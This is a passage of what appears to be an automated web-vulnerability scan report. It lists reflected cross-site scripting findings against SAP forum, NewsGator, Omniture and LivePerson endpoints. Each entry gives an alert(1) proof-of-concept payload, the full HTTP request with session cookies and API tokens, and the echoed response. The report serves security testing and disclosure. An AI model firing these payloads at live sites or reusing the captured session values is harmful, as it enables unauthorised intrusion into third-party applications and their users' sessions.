s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTgzOUMtRjhFMTQwRTYxODU2ODVBQQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8722
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...

   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=20591626703c</script><a>08b4367be6b&tstart=0";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.33. http://forums.sdn.sap.com/thread.jspa [tstart parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the tstart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b4c8</script><a>b798772e4f3 was submitted in the tstart parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=2059162&tstart=01b4c8</script><a>b798772e4f3 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUFDQjEtMzE3QTM2QTc3Mjg1NDE2Nw==
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9061
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: </title
...[SNIP]...
="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=01b4c8</script><a>b798772e4f3";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...
3.34. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 3aa10<script>alert(1)</script>92b285fbac7 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=8A9F478544194B85AC55E891BBE40862&buzzId=215423&_dsrId=ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 15 Oct 2011 13:56:52 GMT
ETag: 634542838121454462
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3034
Cache-Control: public, max-age=300
Date: Sat, 15 Oct 2011 14:24:41 GMT
Connection: close

window.ng_scriptload({id:'ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7',status:200,statusText:'200 OK',response:{Data:[{PostId:21062774210,PubDate:new Date(1318646580000),FeedName:'SAP Developer Network SAP Weblogs: SAP TechEd',Title:'Tune in to SAP TechEd Live!',HtmlUrl
...[SNIP]...
3.35. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c4314<script>alert(1)</script>7157f909e78 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=215423c4314<script>alert(1)</script>7157f909e78&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
X-N: S

//An error occurred: Could not find Buzz item with id: 215423c4314<script>alert(1)</script>7157f909e78
3.36. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 64204%3balert(1)//95fd43ea14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64204;alert(1)//95fd43ea14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862&64204%3balert(1)//95fd43ea14=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT
ETag: 634536151927656250
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3794
Cache-Control: public, max-age=600
Date: Sat, 15 Oct 2011 14:24:30 GMT
Connection: close

try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick
...[SNIP]...

var s = function(){
   try{
       if(typeof ng != "undefined" && typeof ng.buzz != "undefined" && ng.buzz.Buzzlet){
           var b = new ng.buzz.Buzzlet({apiToken:'8A9F478544194B85AC55E891BBE40862',extraArgs:{64204;alert(1)//95fd43ea14:'1'},templateId:'buzzTemplate_215423',name:'_Events - SAP TechEd V2',buzzId:215423,targetId:null,orgCode:'6679',buzzTracking:{parentTrackingId:null,myTrackingId:null},scriptCtx:'window',analytics:{ngA
...[SNIP]...
3.37. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4ee84<script>alert(1)</script>910c67c89ad was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=4&mbox=newhome_offer4ee84<script>alert(1)</script>910c67c89ad&mboxId=0&mboxTime=1318668445075&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:18 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 209
Date: Sat, 15 Oct 2011 13:48:17 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offer4ee84<script>alert(1)</script>910c67c89ad',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");
3.38. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4 was submitted in the mbox parameter. This input was echoed as bd310<img src=a onerror=alert(1)>7e3be76c3d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20eventbd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:49:30 GMT; Path=/m2/omnituremarketing
Content-Length: 264
Date: Sat, 15 Oct 2011 13:49:30 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: eventbd310<img src=a onerror=alert(1)>7e3be76c3d4', 0).setOffer(new mboxOfferDefault()).loaded();}
3.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d7f05<script>alert(1)</script>7762cc0ab06 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0d7f05<script>alert(1)</script>7762cc0ab06&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:49:33 GMT; Path=/m2/omnituremarketing
Content-Length: 261
Date: Sat, 15 Oct 2011 13:49:33 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0d7f05<script>alert(1)</script>7762cc0ab06).setOffer(new mboxOfferDefault()).loaded();}
3.40. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 56ff3<script>alert(1)</script>1c85f2b1615 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging56ff3<script>alert(1)</script>1c85f2b1615&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:20 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 217
Date: Sat, 15 Oct 2011 13:48:20 GMT
Server: Test & Target

mboxFactories.get('staging').get('newhome_offer-staging56ff3<script>alert(1)</script>1c85f2b1615',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('staging').getPCId().forceId("1318631787015-280970.19");
3.41. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f841'%3balert(1)//e40655f8366 was submitted in the mboxFactoryId parameter. This input was echoed as 8f841';alert(1)//e40655f8366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging8f841'%3balert(1)//e40655f8366&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:07 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1185
Date: Sat, 15 Oct 2011 13:48:07 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging8f841';alert(1)//e40655f8366').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-staging8f841';alert(1)//e40655f8366-newhome_o
...[SNIP]...
3.42. http://sales.liveperson.net/hc/37021986/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1af53<img%20src%3da%20onerror%3dalert(1)>2257775d063 was submitted in the msessionkey parameter. This input was echoed as 1af53<img src=a onerror=alert(1)>2257775d063 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/37021986/?&visitor=5110247826455&msessionkey=37230221800283374401af53<img%20src%3da%20onerror%3dalert(1)>2257775d063&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=385121324332-892147257225&protV=20&lpjson=1&id=4161424150&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C%23chat-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic1%7C%23chat-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic2%7C%23chat-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic3%7C%23voice-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic1%7C%23voice-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic2%7C%23voice-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:25:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=37230221800283374401af53<img src=a onerror=alert(1)>2257775d063; path=/hc/37021986
Set-Cookie: HumanClickKEY=37230221800283374401af53<img src=a onerror=alert(1)>2257775d063; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:25:48 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 42312

lpConnLib.Process({"ResultSet": {"lpCallId":"385121324332-892147257225","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
